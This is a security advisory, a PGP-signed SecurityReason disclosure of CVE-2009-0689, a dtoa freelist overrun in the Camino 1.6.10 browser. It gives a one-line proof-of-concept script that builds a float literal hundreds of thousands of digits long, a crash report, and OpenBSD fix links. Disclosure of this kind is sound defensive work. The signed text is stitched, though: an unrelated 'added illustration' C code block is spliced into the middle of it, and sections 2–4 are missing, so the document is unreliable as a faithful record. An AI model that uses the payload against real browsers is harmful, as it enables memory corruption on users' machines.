-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
Fixed in:
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/76
— 0. Description —
Camino (from the Spanish word camino meaning "way", "path" or "road") is a free, open source,
GUI-based Web browser based on Mozilla's Gecko layout engine and specifically designed for the Mac
OS X operating system. In place of an XUL-based user interface used by most Mozilla-based
applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.
— 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) —
The main problem exists in the dtoa implementation. Camino ships the same dtoa as Firefox, SeaMonkey,
Chrome, Opera etc.,
and the issue is the same as SREASONRES:20090625,
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good enough.
More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create a float literal of any length, which will overwrite memory. In dtoa,
Kmax is defined as 15. The dtoa functions do not check the Kmax limit, so
it is possible to reach element 16 or higher of the freelist array.
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
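As an added illustration of the bound the advisory describes (example code written for this page, not Camino's, Mozilla's or OpenBSD's dtoa), here is a minimal model of dtoa's Balloc/Bfree freelist with the k > Kmax check that the unchecked version lacks. Kmax = 15 is the value cited above; the Bigint layout and the k > 29 guard are simplifying assumptions.

```c
#include <stdlib.h>

#define Kmax 15  /* value cited in the advisory: freelist[] has Kmax+1 slots, k = 0..15 */

/* Simplified Bigint layout (assumption for this example, not Mozilla's exact struct). */
typedef struct Bigint {
    struct Bigint *next;
    int k, maxwds, sign, wds;   /* k: block order, 2^k words of storage */
    unsigned x[1];              /* storage continues past the header */
} Bigint;

static Bigint *freelist[Kmax + 1];

/* Hardened Balloc: a request with k > Kmax never indexes freelist[]; it goes
 * straight to malloc. The unchecked dtoa read freelist[k] for any k, which
 * is the out-of-bounds access the advisory describes. */
Bigint *Balloc(int k)
{
    Bigint *rv;
    if (k < 0 || k > 29) return NULL;   /* keep 1 << k well-defined on 32-bit int */
    if (k <= Kmax && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;         /* reuse a cached block of the same order */
    } else {
        int x = 1 << k;
        size_t len = sizeof(Bigint) + (size_t)(x - 1) * sizeof(unsigned);
        rv = malloc(len);
        if (rv == NULL) return NULL;
        rv->k = k;
        rv->maxwds = x;
    }
    rv->sign = rv->wds = 0;
    return rv;
}

/* Hardened Bfree: a block with k > Kmax is returned to the system allocator
 * instead of being pushed onto a freelist slot that does not exist. */
void Bfree(Bigint *v)
{
    if (v == NULL) return;
    if (v->k > Kmax) {
        free(v);
    } else {
        v->next = freelist[v->k];
        freelist[v->k] = v;
    }
}

/* 1 if a block of order k is cached on the freelist, 0 if it bypasses the
 * cache (the case that overran freelist[] before the bounds check). */
int uses_freelist(int k) { return k >= 0 && k <= Kmax; }
```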
Process: Camino [153]
Path: /Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier: org.mozilla.camino
Version: 1.6.10 (1609.09.25)
Code Type: X86 (Native)
Parent Process: launchd [92]
Date/Time: 2009-11-06 12:57:24.698 -0800
OS Version: Mac OS X 10.5.6 (9G55)
Report Version: 6
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590
Crashed Thread: 0
Thread 0 Crashed:
0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list + 235
1 libSystem.B.dylib 0x01d7710d szone_malloc + 180
2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81
3 libSystem.B.dylib 0x01d76fac malloc + 55
4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220
5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282
6 org.mozilla.camino 0x0038ae0e nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7 org.mozilla.camino 0x0038b215 nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8 org.mozilla.camino 0x003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24
9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37
10 org.mozilla.camino 0x003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123
11 org.mozilla.camino 0x002cc924 nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12 org.mozilla.camino 0x002f617b PresShell::InitialReflow(int, int) + 1151
13 org.mozilla.camino 0x005a90d4 nsContentSink::StartLayout(int) + 342
14 org.mozilla.camino 0x00483354 HTMLContentSink::StartLayout() + 82
15 org.mozilla.camino 0x00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&)
Thread 0 crashed with X86 Thread State (32-bit):
eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590
edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190
ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017
ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037
cr2: 0x7e33d590
This list is not yet closed.
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c
— 5. Credits —
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.
— 6. Greets —
Infospec p_e_a pi3
— 7. Contact —
Email:
GPG:
http://securityreason.com/
http://securityreason.pl/
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkshevAACgkQpiCeOKaYa9aj5gCcDrfDkGIjDV2Fo+J402jTE7u3
rwYAni4FngpFFwhcsuoZjNGeeh68lJQ+
=eZDR
-----END PGP SIGNATURE-----